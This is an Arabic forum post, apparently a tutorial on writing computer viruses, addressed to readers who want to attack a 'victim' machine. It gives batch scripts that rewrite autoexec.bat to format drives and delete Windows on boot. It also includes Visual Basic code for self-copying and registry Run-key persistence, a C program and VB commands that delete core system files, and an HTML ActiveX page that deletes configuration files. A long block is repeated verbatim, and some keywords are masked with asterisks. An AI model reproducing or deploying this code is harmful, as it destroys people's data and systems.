[align=center]اولا يوجد بعض الامور توضيحها قبل البدأ فى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـ
C:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما اذا كنت تسوى عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه
تهكرعلى جهاز فقم تحميل هذا الفيروس الى الـ
C:
ولاكنى وجدت فيه عيب بسيط و هو ان هذا الفيروس لن يعمل فى جهاز وضع فيه الويندو داخل فولدر غير windows فمثلا اذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل فولدر win98 فان الفيروس الذى كوناه لن يقوم ببعض الأعمال و هى نسخ الأوامر و مسح الويندوز ولكنه سوف يقوم بعمل فورمات
اما بالنسبة لتعديله فكل ما استطيع ان اعطيكم اياه من تعديل مفيد فيه و هو انكم تمسحوا اوامر مسح الويندوز و Program files و تدع امر الفورمات مع تغير مثلا انه يسوى فورما على الـ
D:
فيكون لكود كما يلى
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
----------------
الكود الثالث :
--------------
code:--------------------------------------------------------------------------------echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
يعتبر هذا الفيروس نفس عمل السابق لذا انا لست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه
كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ
Autoexec.bat
الأن و بعد ان تعرفنا الى الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده
الخاصــــــــــــــية الأولى :-
On Error Resume Next
Dim copy, copy2
copy = "c:\virus.exe"
copy2 = "c:\windows\system\Project12.exe"
FileCopy copy, copy2
يعطى هذا الكود للفيروس خاصية نسخ نفسه الى مكان اخر حتى لا يمكن للضحيه ايقافه بمجرد مسحه و يمكننا من التعامل مع الكود بكل بساطة هذا اذا كنت من الفاهمين للكمبيوتر بدرجة جيدة و ليس للبرامج الصغيرة التى تاتى معه
الخاصــــــــــــــية الثانيه :-
Option Explicit
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Const REG_SZ = 1
Private Const LOCALMACHINE = &H80000002
Private Sub Command1_Click()
Dim InputValue As String
Dim nBufferKey As Long, nBufferSubKey As Long
RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
InputValue = "c:\windows\system\Project12.exe"
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)
End Sub
يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتح الجهاز و هذا عن طريق تعديل ال
registry :
هذا هو كل ما انا حصلت عليه من اكواد للفيروسات فلقد شرحت لكم مجموعه من اكواد الفيروسات التى يمكننا من استخدامها و مجموعه من الأكواد التى باضافتها للفيروس تعطى له خصائص مفيده و هذا ليس كل شئ فنا ان حصلت على أى كود اخر فسوف اعطيه لكم فى هذا الموضوع و سوف اشرح فيه كل ما انا استطيع لذا انتظروا منى المفيد و يتبقى لنا شئ بسيط وانهى هذا الجزء و هو مجموعة اكواد لأشهر الفيروسات
______________
فيرووس C++ :
( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )*
#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\tFuck -oO Israel Oo- and -oO America Oo-\n\n");
remove("c:\\windows\\system.ini");
remove("c:\\windows\\win.ini");
remove("c:\\autoexec.bat");
remove("c:\\msdos.sys");
remove("c:\\io.sys");
remove("c:\\command.com");
remove("c:\\config.sys");
remove("c:\\windows\\ebd\\command.com");
remove("c:\\windows\\ebd\\ebd.cab");
remove("c:\\windows\\ebd\\Autoexec.bat");
remove("c:\\windows\\ebd\\setramd.bat");
remove("c:\\windows\\ebd\\Findramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}
فيرووس Visual Basic :
( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )*
SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"
فيروس Html
( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )*
<html>
<head>
<( * )( * )( * )( * ) ( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )="( * )( * )( * )( * )( * )( * )( * )-Type"
( * )( * )( * )( * )( * )( * )( * )="( * )( * )( * )( * )/html; charset=iso-8859-1">
<title>Active-X HTML</title>
</head>
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<body bgcolor="#000000" ( * )( * )( * )( * )="#C0C0C0">
<( * )( * )( * )( * )( * )( * ) ( * )( * )( * )( * )( * )( * )( * )( * )="VB( * )( * )( * )( * )( * )( * )">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("( * )( * )( * )( * )( * )( * )ing.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("( * )( * )( * )( * )( * )( * )ing.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
</( * )( * )( * )( * )( * )( * )>
<!--- This ( * )( * )( * )( * )( * )( * ) author is THEONE---!>
</body>
</html>
( ملاحظة يحفظ هذا الفيروس بأمتداد html .* )
يمكنك من دراسة هذه الأكواد و النظر فيها الى ما قد يفيدكم فيمكنكم من نقل بعض الأجزاء من الفيروسات السابقة عمل فيروس قوى يخصكم
هذا هو كل ما املك فى هذا الجزء و هو كما قلت لكم سابقا هو قابل للتطوير
_____________________
فيرووس C++ :
( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )*
#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\tFuck -oO Israel Oo- and -oO America Oo-\n\n");
remove("c:\\windows\\system.ini");
remove("c:\\windows\\win.ini");
remove("c:\\autoexec.bat");
remove("c:\\msdos.sys");
remove("c:\\io.sys");
remove("c:\\command.com");
remove("c:\\config.sys");
remove("c:\\windows\\ebd\\command.com");
remove("c:\\windows\\ebd\\ebd.cab");
remove("c:\\windows\\ebd\\Autoexec.bat");
remove("c:\\windows\\ebd\\setramd.bat");
remove("c:\\windows\\ebd\\Findramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}
فيرووس Visual Basic :
( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )*
SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"
فيروس Html
( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )*
<html>
<head>
<( * )( * )( * )( * ) ( * )( * )( * )( * )( * )( * )( * )( * )( * )( * )="( * )( * )( * )( * )( * )( * )( * )-Type"
( * )( * )( * )( * )( * )( * )( * )="( * )( * )( * )( * )/html; charset=iso-8859-1">
<title>Active-X HTML</title>
</head>
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<body bgcolor="#000000" ( * )( * )( * )( * )="#C0C0C0">
<( * )( * )( * )( * )( * )( * ) ( * )( * )( * )( * )( * )( * )( * )( * )="VB( * )( * )( * )( * )( * )( * )">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("( * )( * )( * )( * )( * )( * )ing.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("( * )( * )( * )( * )( * )( * )ing.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
</( * )( * )( * )( * )( * )( * )>
<!--- This ( * )( * )( * )( * )( * )( * ) author is THEONE---!>
</body>
</html>
ملاحظة يحفظ هذا الفيروس بأمتداد
html .*
يمكنك من دراسة هذه الأكواد و النظر فيها الى ما قد يفيدكم فيمكنكم من نقل بعض الأجزاء من الفيروسات السابقة عمل فيروس قوى يخصكم
وفى النهايه من لديه أيه معلومه تفيد الموضوع نرجو وضعها للأستفاده منها
أتمنى أنكم تكونوا قد أستفدتم من الموضوع
دمتم بوووووووووووووود[/align]
شرح لأقوى طرق تصميم الفايروس وطرق الأختراق... 
العرض العادي
